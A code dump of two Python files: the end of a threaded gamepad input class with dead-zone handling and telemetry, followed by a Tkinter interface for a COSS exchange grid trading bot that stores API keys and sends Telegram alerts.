int_limit: Absolute value of integrators will be limited to this.
int_loop_period: Period in seconds for the integrator thead loop.
"""
self.left_x = 0.0
self.left_y = 0.0
self.right_x = 0.0
self.right_y = 0.0
self.int_x = 0.0
self.int_y = 0.0
self.left_gain = left_gain
self.right_gain = right_gain
self.int_loop_period = int_loop_period
self.int_limit = int_limit
self.callbacks = {}
self.state = {'ABS_X': 0, 'ABS_Y': 0, 'ABS_RX': 0, 'ABS_RY': 0}
num_gamepads_found = len(inputs.devices.gamepads)
if num_gamepads_found < 1:
raise RuntimeError('No gamepads found')
elif num_gamepads_found > 1:
print(f'Found {num_gamepads_found} gamepads:')
for idx, gamepad in enumerate(inputs.devices.gamepads):
print(f'{idx:2d}: {gamepad.name}')
selected_index = click.prompt('Which one?', default=0)
else:
selected_index = 0
self.gamepad = inputs.devices.gamepads[selected_index]
self.input_thread = threading.Thread(target=self.__get_input, name='Gamepad: input thread')
self.integrator_thread = threading.Thread(
target=self.__integrator,
name='Gamepad: integrator thread'
)
self.integrator_mode = False
self.running = True
self.debug_prints = False
# Use a selector on the character device that the inputs package reads from so that we
# can avoid blocking on calls to gamepad.read() in the input_thread loop. Calls that block
# indefinitely make it impossible to stop the thread which then makes clean program
# shutdown difficult or impossible. Daemon threads were used previously but daemon threads
# are not shut down cleanly.
self.sel = selectors.DefaultSelector()
self.sel.register(self.gamepad._character_device, selectors.EVENT_READ)
self.input_thread.start()
self.integrator_thread.start()
def stop(self):
"""Stops the threads from running."""
self.running = False
self.input_thread.join()
self.integrator_thread.join()
def get_proportional(self):
"""Returns a tuple containing the instantaneous x/y values."""
x = np.clip(self.left_gain*self.left_x + self.right_gain*self.right_x, -1.0, 1.0)
y = np.clip(self.left_gain*self.left_y + self.right_gain*self.right_y, -1.0, 1.0)
return (x, y)
def get_integrator(self):
"""Returns a tuple containing the integrated x/y values."""
return (self.int_x, self.int_y)
def get_value(self):
"""Returns a tuple containing instantaneous or integrated x/y values based on mode."""
if self.integrator_mode:
return self.get_integrator()
else:
return self.get_proportional()
def register_callback(self, event_code=None, callback=None):
"""Register a callback function to be called when a particular gamepad event occurs.
Args:
event_code: The event code as a string. For example, if set to 'ABS_X', the callback
function will be called anytime an event with that code id detected.
callback: Function to be called. The function should take a single argument which will
be set to event.state for the matching event code. Set to None to remove the
callback for this code. Only one callback can be registered per event code.
"""
self.callbacks[event_code] = callback
def _update_analog(self, stick: str) -> None:
"""Convert integer analog stick values to floating point"""
if stick == 'left':
raw_vector = self.state['ABS_X'] - 1j*self.state['ABS_Y']
elif stick == 'right':
raw_vector = self.state['ABS_RX'] - 1j*self.state['ABS_RY']
else:
raise ValueError("stick must be 'left' or 'right'")
raw_mag = abs(raw_vector)
# scaled dead zone algorithm
# https://www.gamasutra.com/blogs/JoshSutphin/20130416/190541/Doing_Thumbstick_Dead_Zones_Right.php
if raw_mag >= self.DEAD_ZONE_MAG:
scaled_mag = (raw_mag - self.DEAD_ZONE_MAG) / (self.MAX_ANALOG_VAL - self.DEAD_ZONE_MAG)
else:
scaled_mag = 0.0
scaled_vector = scaled_mag * np.exp(1j*np.angle(raw_vector))
if stick == 'left':
self.left_x = scaled_vector.real
self.left_y = scaled_vector.imag
elif stick == 'right':
self.right_x = scaled_vector.real
self.right_y = scaled_vector.imag
def __get_input(self):
"""Thread for reading input from gamepad"""
# Make sure this thread does not have realtime priority
os.sched_setscheduler(0, os.SCHED_OTHER, os.sched_param(0))
while True:
if not self.running:
return
# use select() to check if events are waiting to avoid blocking on read()
if self.sel.select(timeout=0.1):
# call to read() is blocking
events = self.gamepad.read()
for event in events:
# cache the raw state of this event
self.state[event.code] = event.state
if event.code == 'ABS_X':
self._update_analog('left')
elif event.code == 'ABS_Y':
self._update_analog('left')
elif event.code == 'ABS_RX':
self._update_analog('right')
elif event.code == 'ABS_RY':
self._update_analog('right')
elif event.code == 'BTN_NORTH' and event.state == 1:
self.int_x = 0.0
elif event.code == 'BTN_WEST' and event.state == 1:
self.int_y = 0.0
elif event.code == 'BTN_TL' and event.state == 1:
self.integrator_mode = False
elif event.code == 'BTN_TR' and event.state == 1:
self.integrator_mode = True
# call any callbacks registered for this event.code
callback = self.callbacks.get(event.code, None)
if callback is not None:
callback(event.state)
if self.debug_prints:
print(event.code + ': ' + str(event.state))
def __integrator(self):
"""Thread function for integrating analog stick values.
Inputs from both analog sticks are multiplied by the respective gains
and integrated. This is done in a separate thread so that the
integrators can continue running even when the input thread is blocked
waiting for new events from the controller.
"""
# Make sure this thread does not have realtime priority
os.sched_setscheduler(0, os.SCHED_OTHER, os.sched_param(0))
while True:
time_loop_start = time.perf_counter()
if not self.running:
return
if self.integrator_mode:
self.int_x += self.left_gain * self.int_loop_period * self.left_x
self.int_y += self.left_gain * self.int_loop_period * self.left_y
self.int_x += self.right_gain * self.int_loop_period * self.right_x
self.int_y += self.right_gain * self.int_loop_period * self.right_y
self.int_x = np.clip(self.int_x, -self.int_limit, self.int_limit)
self.int_y = np.clip(self.int_y, -self.int_limit, self.int_limit)
time_elapsed = time.perf_counter() - time_loop_start
time_sleep = self.int_loop_period - time_elapsed
if time_sleep > 0:
time.sleep(time_sleep)
def get_telem_points(self) -> List[Point]:
"""Called by telemetry logger. See `TelemSource` abstract base class."""
point = Point('gamepad')
# attributes of this object to be captured as fields in the telemetry measurement
names = ['left_x', 'left_y', 'right_x', 'right_y', 'int_x', 'int_y', 'integrator_mode']
for name in names:
point.field(name, self.__dict__[name])
point.time(datetime.utcnow())
point_raw = Point.from_dict({
'measurement': 'gamepad_events',
'fields': self.state,
'time': datetime.utcnow(),
})
return [point, point_raw]
def main():
"""Prints all gamepad events received"""
gamepad = Gamepad()
gamepad.debug_prints = True
try:
signal.pause()
except KeyboardInterrupt:
gamepad.stop()
print('goodbye')
if __name__ == "__main__":
main()
|
Simplicity.py
|
import os, sys
import pickle
import threading, time
import requests
import tkinter as tk
import exchange
from exchange import exchangeInfo
import gridBot
from gridBot import gridBotStart
from os import path
from datetime import datetime
from tkinter import *
from tkinter import messagebox
from PIL import Image, ImageTk
from functools import partial
from sys import exit
'''
Pre-Reqs
--------
Download and install python3 with pip
In a console or terminal run:
pip install Pillow
pip install requests
(Linux only) sudo apt install python3-tk
Once all packages are installed please run this python script to start the UI
'''
#StaticVariables
CANVASHEIGHT=600
CANVASWIDTH=500
FRAMEHEIGHT=0.8
FRAMEWIDTH=0.8
FRAMEPADX=0.1
FRAMEPADY=0.125
BTNPADX_L=14
BTNPADX_S=10
BTNPADX_M=12
BTNPADY=5
HISTORYWIDTH=47
HISTORYHEIGHT=27.4
if os.name != "nt":
CANVASHEIGHT=600
CANVASWIDTH=700
FRAMEHEIGHT=0.8
FRAMEWIDTH=0.8
FRAMEPADX=0.1
FRAMEPADY=0.125
BTNPADX_L=24
BTNPADX_S=20
BTNPADX_M=22
BTNPADY=7
HISTORYWIDTH=66
HISTORYHEIGHT=25
#UI Colors
CANVASBG = "black"
BACKGROUND = CANVASBG
FOREGROUND = "white"
BTNBG = "grey"
BTNCLICKEDBG = "blue"
BTNFG = "black"
BTNCLICKEDFG = "white"
BTNFRAMEBG = CANVASBG
def initializeBot():
#Load telegram settings
if not os.path.exists("telegramSettings.conf"):
with open('telegramSettings.conf', 'wb') as f:
pickle.dump([False, "", ""], f)
with open('telegramSettings.conf', 'rb') as f:
isTelegramEnabled, getTelegramToken, getTelegramChatID = pickle.load(f)
if isTelegramEnabled:
enableTelegramChk.select()
telegramCheckBoxChanged()
tokenBox.delete(0, tk.END)
tokenBox.insert(tk.END, getTelegramToken.strip())
chatIDBox.delete(0, tk.END)
chatIDBox.insert(tk.END, getTelegramChatID.strip())
if isTelegramEnabled:
sendTelegramMessage("An instance of your Simplicity COSS bot was just launched. If this wasn't you please login to your COSS account and disable your API keys immediately.", False)
#Clear all frames
def clearFrames():
homeFrame.place_forget()
settingsFrame.place_forget()
runFrame.place_forget()
aboutFrame.place_forget()
historyFrame.place_forget()
botOptionsFrame.place_forget()
gridStratFrame.place_forget()
blStratFrame.place_forget()
homeBtn.config(bg=BTNBG, fg=BTNFG)
runBtn.config(bg=BTNBG, fg=BTNFG)
settingsBtn.config(bg=BTNBG, fg=BTNFG)
aboutBtn.config(bg=BTNBG, fg=BTNFG)
historyBtn.config(bg=BTNBG, fg=BTNFG)
botOptionBtn.config(bg=BTNBG, fg=BTNFG)
#Create function for run button
def openHome():
'''
Switches frames to the home tab
'''
clearFrames()
homeBtn.config(bg=BTNCLICKEDBG, fg=BTNCLICKEDFG)
homeFrame.place(relwidth=FRAMEHEIGHT, relheight=FRAMEWIDTH, relx=FRAMEPADX, rely=FRAMEPADY)
#Create function for settings/strategy button
def openSettings():
'''
Switches frames to the settings tab
'''
clearFrames()
settingsBtn.config(bg=BTNCLICKEDBG, fg=BTNCLICKEDFG)
settingsFrame.place(relwidth=FRAMEHEIGHT, relheight=FRAMEWIDTH, relx=FRAMEPADX, rely=FRAMEPADY)
gridStratFrame.place(relwidth=FRAMEWIDTH*0.9, relheight=FRAMEHEIGHT/1.8, relx=FRAMEPADX*1.4, rely=FRAMEPADY*3.1)
#Load all grid strategy settings
# Load Grid Settings
with open('gridSettings.conf', 'rb') as f: # Python 3: open(..., 'rb')
quotesPair, tradePair, publicKey, privateKey, orderSize, gridDistance, lowerBuyPrice, higherBuyPrice, lowerSellPrice, higherSellPrice, numberGrids = pickle.load(f)
quotePair.set(quotesPair)
publicAPIKeyBox.delete(0, tk.END)
publicAPIKeyBox.insert(tk.END, publicKey)
privateAPIKeyBox.delete(0, tk.END)
privateAPIKeyBox.insert(tk.END, privateKey)
orderSizeBox.delete('1.0', tk.END)
orderSizeBox.insert(tk.END, orderSize)
gridDistanceBox.delete('1.0', tk.END)
gridDistanceBox.insert(tk.END, gridDistance)
#buyPriceLowerBox.delete('1.0', tk.END)
#buyPriceLowerBox.insert(tk.END, lowerBuyPrice)
#buyPriceHigherBox.delete('1.0', tk.END)
#buyPriceHigherBox.insert(tk.END, higherBuyPrice)
#sellPriceLowerBox.delete('1.0', tk.END)
#sellPriceLowerBox.insert(tk.END, lowerSellPrice)
#sellPriceHigherBox.delete('1.0', tk.END)
#sellPriceHigherBox.insert(tk.END, higherSellPrice)
numberOfGrids.set(numberGrids)
quotePairChanged(None, tradePair)
#Create function for run button
def openRun():
'''
Switches frames to the run tab
'''
#Load Strategy Settings
with open('gridSettings.conf', 'rb') as f: # Python 3: open(..., 'rb')
quotePairRun, tradePairRun, publicAPIKey, privateAPIKey, orderSize, gridDistance, temp, temp, temp, temp, numberOfGrids = pickle.load(f)
clearFrames()
runBtn.config(bg=BTNCLICKEDBG, fg=BTNCLICKEDFG)
#Check if API keys are correct
loadPrice = exchangeInfo(publicAPIKey, privateAPIKey)
#Get latest current price
try:
latestPairPrice = loadPrice.getPairPrice(quotePairRun, tradePairRun)
except:
print("There was an error when fetching pair price")
#Calculate start buy/sell and stop price ranges automatically
if float(gridDistance) >= float(latestPairPrice):
messagebox.showinfo("Warning", "Your grid distance cannot be greater than or equal to the current price of the pair! Please adjust your strategy")
openSettings()
return 0
startBuyPrice = round(float(latestPairPrice) - float(gridDistance), 8)
startSellPrice = round(float(latestPairPrice) + float(gridDistance), 8)
stopBuyPrice = round((startBuyPrice - (float(gridDistance) * (float(numberOfGrids)/2))) - float(gridDistance), 9)
stopSellPrice = round((startSellPrice + (float(gridDistance) * (float(numberOfGrids)/2))) + float(gridDistance), 9)
#Update information in text fields
runStrategyBox.config(state="normal")
runStrategyBox.delete('1.0', tk.END)
runStrategyBox.insert(tk.END, "Grid MM")
runStrategyBox.config(state="disabled")
runTradePairBox.config(state="normal")
runTradePairBox.delete('1.0', tk.END)
runTradePairBox.insert(tk.END, tradePairRun + "_" + quotePairRun)
runTradePairBox.config(state="disabled")
runInstanceNameBox.delete('1.0', tk.END)
runInstanceNameBox.insert(tk.END, "Grid MM" + "_" + tradePairRun + "_" + quotePairRun)
startBuyBox.delete('1.0', tk.END)
startBuyBox.insert(tk.END, floatToStr(startBuyPrice))
startSellBox.delete('1.0', tk.END)
startSellBox.insert(tk.END, floatToStr(startSellPrice))
stopBuyBox.delete('1.0', tk.END)
stopBuyBox.insert(tk.END, floatToStr(stopBuyPrice))
stopSellBox.delete('1.0', tk.END)
stopSellBox.insert(tk.END, floatToStr(stopSellPrice))
balancesRequired = calcRequiredBalance()
quoteBalanceUseLabel.config(text=" Amount of " + quotePairRun + " needed for strategy:")
tradeBalanceUseLabel.config(text=" Amount of " + tradePairRun + " needed for strategy:")
quoteBalanceUseBox.config(state="normal")
quoteBalanceUseBox.delete('1.0', tk.END)
quoteBalanceUseBox.insert(tk.END, str(balancesRequired[0]))
quoteBalanceUseBox.config(state="disabled")
tradeBalanceUseBox.config(state="normal")
tradeBalanceUseBox.delete('1.0', tk.END)
tradeBalanceUseBox.insert(tk.END, str(balancesRequired[1]))
tradeBalanceUseBox.config(state="disabled")
runFrame.place(relwidth=FRAMEHEIGHT, relheight=FRAMEWIDTH, relx=FRAMEPADX, rely=FRAMEPADY)
#Create function for about button
def openAbout():
'''
Switches frames to the about tab
'''
clearFrames()
aboutBtn.config(bg=BTNCLICKEDBG, fg=BTNCLICKEDFG)
aboutFrame.place(relwidth=FRAMEHEIGHT, relheight=FRAMEWIDTH, relx=FRAMEPADX, rely=FRAMEPADY)
#Create function for history button
def openHistory():
'''
Switches frames to the about tab
'''
clearFrames()
historyBtn.config(bg=BTNCLICKEDBG, fg=BTNCLICKEDFG)
historyFrame.place(relwidth=FRAMEHEIGHT, relheight=FRAMEWIDTH, relx=FRAMEPADX, rely=FRAMEPADY)
#Create function for botOptions button
def openOptions():
'''
Switches frames to the options setting tab
'''
clearFrames()
botOptionBtn.config(bg=BTNCLICKEDBG, fg=BTNCLICKEDFG)
botOptionsFrame.place(relwidth=FRAMEHEIGHT, relheight=FRAMEWIDTH, relx=FRAMEPADX, rely=FRAMEPADY)
def historyReresh():
while True:
if os.path.exists("history.txt"):
with open("history.txt", "rb") as f2:
f2.seek(0)
historyTextField.delete("1.0", tk.END)
historyTextField.insert(tk.END, f2.read())
historyTextField.see("end")
time.sleep(10)
def tradingPairChanged(event, pair):
'''
Update settings page with new trading pair
'''
if pair is not None:
tradingPair.set(pair)
tradePairBalanceLabel.config(text=" Trade Balance (" + tradingPair.get() + ")")
orderSizeLabel.config(text=" Order Size (" + tradingPair.get() + ")")
#Load selected pair balances
balances = {
"quote": 0.0,
"trade": 0.0
}
balancePublicKey = publicAPIKeyBox.get().strip()
balancePrivateKey = privateAPIKeyBox.get().strip()
balanceKeys = exchangeInfo(balancePublicKey, balancePrivateKey)
try:
balances = balanceKeys.getCryptoBalance(quotePair.get(), tradingPair.get())
except:
print("There was some error when loading balances")
if "quote" in balances:
quotePairBalanceBox.config(state="normal")
quotePairBalanceBox.delete('1.0', tk.END)
quotePairBalanceBox.insert(tk.END, balances["quote"])
quotePairBalanceBox.config(state="disabled")
tradePairBalanceBox.config(state="normal")
tradePairBalanceBox.delete('1.0', tk.END)
tradePairBalanceBox.insert(tk.END, balances["trade"])
tradePairBalanceBox.config(state="disabled")
else:
print("Cannot access balances due to API error")
quotePairBalanceBox.config(state="normal")
quotePairBalanceBox.delete('1.0', tk.END)
quotePairBalanceBox.insert(tk.END, "N/A")
quotePairBalanceBox.config(state="disabled")
tradePairBalanceBox.config(state="normal")
tradePairBalanceBox.delete('1.0', tk.END)
tradePairBalanceBox.insert(tk.END, "N/A")
tradePairBalanceBox.config(state="disabled")
pairPrice = 0
try:
pairPrice = balanceKeys.getPairPrice(quotePair.get(), tradingPair.get())
except:
print("There was an error when fetching pair price")
currentPriceBox.config(state="normal")
currentPriceBox.delete('1.0', tk.END)
currentPriceBox.insert(tk.END, pairPrice)
currentPriceBox.config(state="disabled")
def quotePairChanged(event, trade = None):
#Update trading pair options
allPairs = myExchange.getAllPairs(str(quotePair.get()))
allPairs.sort()
tradingPair.set(allPairs[0])
pairMenu['menu'].delete(0, 'end')
# Insert list of new options (tk._setit hooks them up to var)
new_choices = allPairs
tradingEventWithArgs = partial(tradingPairChanged, None)
for choice in new_choices:
pairMenu['menu'].add_command(label=choice, command=partial(tradingPairChanged, None, choice))
tradingPairChanged(None, trade)
quotePairBalanceLabel.config(text=" Quote Balance (" + quotePair.get() + ")")
#buyRangeLabel.config(text=" Stop Price Range (" + quotePair.get() + ")")
#sellRangeLabel.config(text=" Start Buy / Sell (" + quotePair.get() + ")")
gridDistanceLabel.config(text=" Grid Distance (" + quotePair.get() + ")")
currentPriceLabel.config(text=" Current Price (" + quotePair.get() + ")")
def stratMenuChanged(event):
'''
Update settings UI to reflect changed strategy
'''
if tradingStrat.get() == "Buy Low Sell High":
tradingStrat.set(tradingStratOptions[0])
messagebox.showinfo("Alert", "This strategy is not yet supported")
elif tradingStrat.get() == "GRID MM":
blStratFrame.place_forget()
gridStratFrame.place(relwidth=FRAMEWIDTH*0.9, relheight=FRAMEHEIGHT/1.9, relx=FRAMEPADX*1.4, rely=FRAMEPADY*3.1)
#print("Strategy was changed to " + tradingStrat.get())
def saveStrategy():
#Check if API keys are correct
testPublicKey = publicAPIKeyBox.get().strip()
testPrivateKey = privateAPIKeyBox.get().strip()
testKeys = exchangeInfo(testPublicKey, testPrivateKey)
testConnection = testKeys.testKey()
if testConnection:
messagebox.showinfo("Saved", "Your strategy settings will be applied")
myExchange = testKeys
else:
messagebox.showinfo("Invalid", "Looks like you entered invalid API keys. Please try again!")
return 0
#Save all settings to gridSettings.conf
with open('gridSettings.conf', 'wb') as f:
pickle.dump([quotePair.get().strip(), tradingPair.get().strip(), testPublicKey, testPrivateKey, orderSizeBox.get("1.0", tk.END).strip(), gridDistanceBox.get("1.0", tk.END).strip(), 0, 0, 0, 0, numberOfGrids.get()], f)
openRun()
return 1
def floatToStr(originalNumber):
actualNumber = float(originalNumber)
decimalCount = 0
while actualNumber < 1:
actualNumber = actualNumber * 10
decimalCount = decimalCount + 1
if float(originalNumber) <= 1:
myString = "0."
for i in range(decimalCount-1):
myString = myString + "0"
myString = myString + str(int(float(originalNumber) * (10**(decimalCount+3))))
else:
myString = str(actualNumber)
return myString
def startStrategy():
#Load saved settings and append prices then save
with open('gridSettings.conf', 'rb') as f:
quotePair, tradePair, publicKey, privateKey, orderSize, gridDistance, temp, temp, temp, temp, numberOfGrids = pickle.load(f)
with open('gridSettings.conf', 'wb') as f:
pickle.dump([quotePair, tradePair, publicKey, privateKey, orderSize, gridDistance, stopBuyBox.get("1.0", tk.END), startBuyBox.get("1.0", tk.END), startSellBox.get("1.0", tk.END), stopSellBox.get("1.0", tk.END), numberOfGrids], f)
strategyWithArg = partial(strategyThread, runInstanceNameBox.get("1.0", tk.END).replace(" ", ""))
strategyTestThread = threading.Thread(target=strategyWithArg)
strategyTestThread.daemon = True
strategyTestThread.start()
openHistory()
def strategyThread(name):
myGridBot = gridBotStart
myGridBot.gridStart(name)
def autoStrategy():
#Build Strategy settings automatically for user
pairPrice = 0
userQuoteBalance = 0
userTradeBalance = 0
useMaxBalance = tk.messagebox.askquestion('Warning','When using the auto strategy option Simplicity uses your maximum balances available. Once the strategy is autoconfigured you can simply reduce balance used by lowering the ordersize or reducing number of grids. Would you like to continue?')
if useMaxBalance == "no":
return 0
messagebox.showinfo("Alert", "Simplicity will now gather some data. This may take a few seconds.")
#Get pair data from exchange
#Load selected pair balances
balances = {
"quote": 0.0,
"trade": 0.0
}
balancePublicKey = publicAPIKeyBox.get().strip()
balancePrivateKey = privateAPIKeyBox.get().strip()
balanceKeys = exchangeInfo(balancePublicKey, balancePrivateKey)
try:
balances = balanceKeys.getCryptoBalance(quotePair.get(), tradingPair.get())
except:
print("There was some error when loading balances")
messagebox.showinfo("Error", "There was some error when loading balances. Strategy could not be automatically configured")
return 0
userQuoteBalance = float(balances[0])
userTradeBalance = float(balances[1])
try:
pairPrice = balanceKeys.getPairPrice(quotePair.get(), tradingPair.get())
except:
print("There was an error when fetching pair price")
messagebox.showinfo("Error", "There was an error when fetching pair price. Strategy could not be automatically configured")
return 0
calcOrderSize = 0
calcGridDistance = 0
calcStartBuy = 0
calcStartSell = 0
calcLowPrice = 0
calcHighPrice = 0
calcGrids = 0
def calcRequiredBalance():
balancesRequired = [0, 0]
#Load Strategy Settings
with open('gridSettings.conf', 'rb') as f: # Python 3: open(..., 'rb')
quoteCalc, tradeCalc, temp, temp, orderSize, gridDistance, temp, temp, temp, temp, numberOfGrids = pickle.load(f)
oneSideGrids = int(numberOfGrids)/2
buyStartPrice = float(startBuyBox.get("1.0", tk.END))
sellStartPrice = float(startSellBox.get("1.0", tk.END))
#Calculate quote balance required
total = 0
currentPrice = float(buyStartPrice)
if numberOfGrids > 3:
for x in range(int(oneSideGrids)):
total = total + (float(orderSize) * float(currentPrice))
currentPrice = currentPrice - float(gridDistance)
total = round(total, 8)
else:
total = round(float(orderSize) * float(currentPrice), 8)
balancesRequired[0] = total
#Calculate trade balance required
tradeBalance = float(float(orderSize) * int(oneSideGrids))
balancesRequired[1] = tradeBalance
#Return balances
return balancesRequired
def cancelAllOrders():
cancelAnswer = tk.messagebox.askquestion('Stop strategy?','Are you sure you want to stop the strategy and cancel all your orders? (Note: If you just want to restart the bot and not cancel orders, click no on this message and just close the window and re-start the bot from the run page)')
if cancelAnswer == 'yes':
print("Attempting to cancel all orders")
cancelBot = gridBotStart
cancelBot.cancelAndExit()
print("Bot will exit in 5 seconds! You can restart the bot to re-run the strategy.")
time.sleep(5)
exit(0)
def telegramCheckBoxChanged():
if telegramVar.get() == 0:
confirmDisableTelegram = messagebox.askquestion('Disable Telegram', 'Are you sure you want to disable telegram alerts?')
if confirmDisableTelegram == 'no':
enableTelegramChk.select()
return 0
with open('telegramSettings.conf', 'wb') as f:
pickle.dump([False, tokenBox.get().strip(), chatIDBox.get().strip()], f)
testTelegramBtn.config(state="disabled")
tokenBox.config(state="disabled")
chatIDBox.config(state="disabled")
else:
testTelegramBtn.config(state="normal")
tokenBox.config(state="normal")
chatIDBox.config(state="normal")
with open('telegramSettings.conf', 'rb') as f: # Python 3: open(..., 'rb')
temp, getTelegramTokenChange, getTelegramChatIDChange = pickle.load(f)
tokenBox.delete(0, tk.END)
tokenBox.insert(tk.END, getTelegramTokenChange.strip())
chatIDBox.delete(0, tk.END)
chatIDBox.insert(tk.END, getTelegramChatIDChange.strip())
#messagebox.showinfo("Telegram Enabled", "To enable telegram alerts please insert your Telegram bot token and chat ID then press the 'Test and Save' button to enable.")
def sendTelegramMessage(message, isATest):
'''
Send a Telegram message to users telegram bot
'''
if isATest:
telegramToken = tokenBox.get().strip()
telegramChatID = chatIDBox.get().strip()
messagebox.showinfo("Telegram Test", "The bot will now send a message to your telegram bot and save your telegram settings. If you don't recieve it please confirm your token and chat ID are correct and try again.")
messageSender = 'https://api.telegram.org/bot' + telegramToken + '/sendMessage?chat_id=' + telegramChatID + '&parse_mode=Markdown&text=' + message
#Save all settings to gridSettings.conf
with open('telegramSettings.conf', 'wb') as f:
pickle.dump([isATest, telegramToken, telegramChatID], f)
else:
telegramToken = tokenBox.get()
telegramChatID = chatIDBox.get()
messageSender = 'https://api.telegram.org/bot' + telegramToken + '/sendMessage?chat_id=' + telegramChatID + '&parse_mode=Markdown&text=' + message
response = requests.get(messageSender)
return response.json()
#Create an instance of exchange object and check connection
myExchange = exchangeInfo()
#Create the root UI
root = tk.Tk()
#root.configure(bg='#282923')
root.resizable(False, False)
if os.name == "nt":
root.attributes('-alpha', 0.97)
#Define Main UI elements
canvas = tk.Canvas(root, height=CANVASHEIGHT, width=CANVASWIDTH, bg=CANVASBG)
btnFrame = tk.Frame(root, bg=BTNFRAMEBG)
homeFrame = tk.Frame(root, bg=BACKGROUND)
runFrame = tk.Frame(root, bg=BACKGROUND)
settingsFrame = tk.Frame(root, bg=BACKGROUND)
aboutFrame = tk.Frame(root,bg=BACKGROUND)
historyFrame = tk.Frame(root,bg=BACKGROUND)
notificationFrame = tk.Frame(root, bg=BACKGROUND)
botOptionsFrame = tk.Frame(root, bg=BACKGROUND)
homeBtn = tk.Button(root, text="Home", padx=BTNPADX_S, pady=5, highlightbackground=BTNFRAMEBG, fg=BTNCLICKEDFG, bg=BTNCLICKEDBG, height=1, width=4, command=openHome, relief=FLAT)
runBtn = tk.Button(root, text="Run", padx=BTNPADX_S, pady=5, highlightbackground=BTNFRAMEBG, fg=BTNFG, bg=BTNBG, height=1, width=4, command=openRun, relief=FLAT)
settingsBtn = tk.Button(root, text="Strategy", padx=BTNPADX_S, pady=5, highlightbackground=BTNFRAMEBG, fg=BTNFG, bg=BTNBG, height=1, width=4, command=openSettings, relief=FLAT)
historyBtn = tk.Button(root, text="History", padx=BTNPADX_S, pady=5, highlightbackground=BTNFRAMEBG, fg=BTNFG, bg=BTNBG, height=1, width=4, command=openHistory, relief=FLAT)
botOptionBtn = tk.Button(root, text="Settings", padx=BTNPADX_M, pady=5, highlightbackground=BTNFRAMEBG, fg=BTNFG, bg=BTNBG, height=1, width=4, command=openOptions, relief=FLAT)
aboutBtn = tk.Button(root, text="About", padx=BTNPADX_S, pady=5, highlightbackground=BTNFRAMEBG, fg=BTNFG, bg=BTNBG, height=1, width=4, command=openAbout, relief=FLAT)
exchangeBtn = tk.Button(root, text="Extras", padx=BTNPADX_L, pady=5, highlightbackground=BTNFRAMEBG, fg="white", bg="#663399", height=1, width=4, command=openAbout, relief=FLAT)
#Define Home page UI elements
homeInfo = tk.Text(homeFrame, relief=FLAT, fg=FOREGROUND, bg=BACKGROUND, height=24, width=47)
homeInfo.pack()
homeInfo.insert(tk.END, "\nSimplicity COSS Bot - Version 1.0\n\nTo get started please first customize your bot\nfrom the strategy tab. You can also enable\ntelegram messaging from the settings tab.")
homeInfo.insert(tk.END, "\n\nOnce configured you can run the bot from the\nrun tab")
homeInfo.insert(tk.END, "\n\nLatest Updates (1/5/2020)\n---------------------------\n - New simplified strategy UI!\n - Added auto calculation of start/sell prices\n - Added auto calculation of stop prices\n - Optional price adjustments on run page\n - Changed default starting pair\n - Code cleanup and bug fixes")
homeInfo.insert(tk.END, "\n\nTrading is very risky, the use of this tool may\nresult in significant losses")
homeInfo.insert(tk.END, "\n\nTo protect your primary COSS account, always\ncreate a second account for use with public\ntrading bots.")
homeInfo.config(state="disabled")
if os.name == "nt":
cossPhoto = ImageTk.PhotoImage(Image.open("coss2.png"))
cossPhotoLabel = tk.Label(homeFrame,text="image",image=cossPhoto, bg=BACKGROUND)
cossPhotoLabel.pack()
else:
print("Images not supported in this OS")
#Define Settings page UI elements
tk.Label(settingsFrame, text="", bg=BACKGROUND).grid(row=0)
publicLabel = tk.Label(settingsFrame, text=" Public API Key")
publicLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
publicLabel.grid(row=1, sticky="W")
publicAPIKeyBox = tk.Entry(settingsFrame, show="*", width=46)
publicAPIKeyBox.grid(row=1, column=1)
privateLabel = tk.Label(settingsFrame, text=" Private API Key")
privateLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
privateLabel.grid(row=2, sticky="W")
privateAPIKeyBox = tk.Entry(settingsFrame, show="*", width=46)
privateAPIKeyBox.grid(row=2, column=1)
#tk.Label(settingsFrame, text="", bg=BACKGROUND).grid(row=3)
tradingPairText = tk.Label(settingsFrame, text=" Quote Pair")
tradingPairText.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
tradingPairText.grid(row=3, column=0, sticky="W")
quotePairOptions = [
"ETH",
"BTC",
"COS",
"USDT",
"DAI",
"USD",
"EUR"
]
quotePair = StringVar(settingsFrame)
quotePair.set(quotePairOptions[0])
quoteMenu = OptionMenu(*(settingsFrame, quotePair) + tuple(quotePairOptions), command=quotePairChanged)
quoteMenu.config(bg=BACKGROUND, fg=FOREGROUND, relief=FLAT)
quoteMenu["menu"].config(bg=BACKGROUND, fg=FOREGROUND, relief=FLAT)
quoteMenu["highlightthickness"]=0
quoteMenu.grid(row=3, column=1)
tradingPairText = tk.Label(settingsFrame, text=" Trade Pair")
tradingPairText.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
tradingPairText.grid(row=4, column=0, sticky="W")
tradingPairOptions = [
"Temp",
"Temp2"
]
tradingPair = StringVar(settingsFrame)
tradingPair.set("temp") # initial value
pairMenu = OptionMenu(*(settingsFrame, tradingPair) + tuple(tradingPairOptions), command=tradingPairChanged)
pairMenu.config(bg=BACKGROUND, fg=FOREGROUND, relief=FLAT)
pairMenu["menu"].config(bg=BACKGROUND, fg=FOREGROUND, relief=FLAT)
pairMenu["highlightthickness"]=0
pairMenu.grid(row=4, column=1)
tradingStratText = tk.Label(settingsFrame, text=" Trading Strategy")
tradingStratText.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
tradingStratText.grid(row=5, column=0, sticky="W")
tradingStratOptions = [
"GRID MM",
"Buy Low Sell High"
]
tradingStrat = StringVar(settingsFrame)
tradingStrat.set(tradingStratOptions[0]) # initial value
stratMenu = OptionMenu(*(settingsFrame, tradingStrat) + tuple(tradingStratOptions), command=stratMenuChanged)
stratMenu.config(bg=BACKGROUND, fg=FOREGROUND, relief=FLAT)
stratMenu["menu"].config(bg=BACKGROUND, fg=FOREGROUND, relief=FLAT)
stratMenu["highlightthickness"]=0
stratMenu.grid(row=5, column=1)
#Define bottom frame for Settings page apply button
saveStratFrame = tk.Frame(settingsFrame, bg=BACKGROUND)
saveStratFrame.place(relwidth=FRAMEWIDTH*1.25, relheight=FRAMEHEIGHT/6.5, relx=0, rely=FRAMEPADY*7.2)
